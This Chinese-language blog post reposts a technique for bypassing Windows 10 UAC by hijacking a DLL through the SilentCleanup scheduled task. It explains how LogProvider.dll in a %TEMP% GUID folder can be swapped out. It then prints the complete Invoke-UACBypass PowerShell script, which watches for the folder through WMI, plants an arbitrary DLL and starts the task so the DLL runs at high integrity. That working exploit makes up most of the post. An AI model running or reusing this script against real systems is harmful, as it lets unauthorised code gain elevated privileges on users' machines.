欢迎光临
我们一直在努力

BypassUac On Win10 Using Disk Cleanup

最近看到enigma0x3博客上分享了一种通过Disk Cleanup计划任务进行bypassuac的姿势,感觉还是不错的,所以在这儿分享一下。原文在这里 戳我
关于BypassUAC工具已经很多了,有个非常不错的工具 UACME

简单的说一下通过Disk Cleanup进行bypassuac的原理。

Win10有一个计划任务叫做

SilentCleanup

,具体位置在

/Microsoft/Windows/DiskCleanup

这个计划任务是会使用最高权限运行程序的,而加载此计划任务不需要最高权限。

此任务执行会运行cleanmgr.exe,而且会创建一个新的文件夹

“C:/Users/<username>/AppData/Local/Temp/<GUID>”

并将

dismhost.exe

以及其使用的相关DLL文件复制到这个文件夹下面。

当dismhost.exe运行时,会加载其要使用的DLL文件,由于当前目录是在%TEMP%,所以完全可以进行DLL劫持,测试发现

LogProvider.dll

是最后一个加载的DLL,可以被我们利用,所以只需要把这个DLL替换成我们的恶意DLL,那么这个计划任务运行的时候,我们的DLL就会被加载,达到BypassUAC的目的。为了能马上进行BypassUAC,可以使用WMI来运行这个计划任务。作者已经给出了利用脚本,链接 BypassUAC , 测试DLL链接:MessageBox

有兴趣的测测看吧~

作者代码被墙了,贴在了下面:


function Invoke-UACBypass { <# .SYNOPSIS Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .PARAMETER DllPath Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%/System32/Dism/LogProvider.dll. .EXAMPLE Invoke-UACBypass -DllPath C:/Users/TestUser/Desktop/Win10UACBypass/PrivescTest.dll .EXAMPLE Invoke-UACBypass -DllPath C:/Users/TestUser/Desktop/TotallyLegit.txt -Verbose The DllPath can have any extension as long as the file itself is a DLL. #>     [CmdletBinding()]     [OutputType([System.IO.FileInfo])]     Param (         [Parameter(Mandatory = $True)]         [String]         [ValidateScript({ Test-Path $_ })]         $DllPath     )     $PrivescAction = {         $ReplacementDllPath = $Event.MessageData.DllPath         # The newly created GUID folder         $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name                  $OriginalPreference = $VerbosePreference         # Force -Verbose to display in the event         if ($Event.MessageData.VerboseSet -eq $True) {             $VerbosePreference = 'Continue'         }         Write-Verbose "DismHost folder created in $DismHostFolder"         Write-Verbose "$ReplacementDllPath to $DismHostFolder/LogProvider.dll"                      try {             $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder/LogProvider.dll" -Force -PassThru -ErrorAction Stop         } catch {             Write-Warning "Error copying file! Message: $_"         }         # Restore the event preference         $VerbosePreference = $OriginalPreference         if ($FileInfo) {             # Trigger Wait-Event to return and indicate success.             New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo         }     }     $VerboseSet = $False     if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }     $MessageData = New-Object -TypeName PSObject -Property @{         DllPath = $DllPath         VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since                                  # event scriptblocks will not automatically honor -Verbose.     }     $TempDrive = $Env:TEMP.Substring(0,2)     # Trigger the DLL dropper with the following conditions:     #  1) A directory is created - i.e. new Win32_Directory instance     #  2) The directory created is created under %TEMP%     #  3) The directory name is in the form of a GUID     $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('/', '//'))//`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""          $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData     # We need to jump through these hoops to properly capture stdout and stderr of schtasks.     $StartInfo = New-Object Diagnostics.ProcessStartInfo     $StartInfo.FileName = 'schtasks'     $StartInfo.Arguments = '/Run /TN "/Microsoft/Windows/DiskCleanup/SilentCleanup" /I'     $StartInfo.RedirectStandardError = $True     $StartInfo.RedirectStandardOutput = $True     $StartInfo.UseShellExecute = $False     $Process = New-Object Diagnostics.Process     $Process.StartInfo = $StartInfo     $null = $Process.Start()     $Process.WaitForExit()     $Stdout = $Process.StandardOutput.ReadToEnd().Trim()     $Stderr = $Process.StandardError.ReadToEnd().Trim()     if ($Stderr) {         Unregister-Event -SubscriptionId $TempFolderWatcher.Id         throw "SilentCleanup task failed to execute. Error message: $Stderr"     } else {         if ($Stdout.Contains('is currently running')) {             Unregister-Event -SubscriptionId $TempFolderWatcher.Id             Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'         }         Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"     }     $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10     Unregister-Event -SubscriptionId $TempFolderWatcher.Id     if ($PayloadExecutedEvent) {         Write-Verbose 'UAC bypass was successful!'         # Output the file info for the DLL that was planted         $PayloadExecutedEvent.MessageData         $PayloadExecutedEvent | Remove-Event     } else {         # The event timed out.         Write-Error 'UAC bypass failed. The DLL was not planted in its target.'     } }
未经允许不得转载:杂术馆 » BypassUac On Win10 Using Disk Cleanup
分享到: 更多 (0)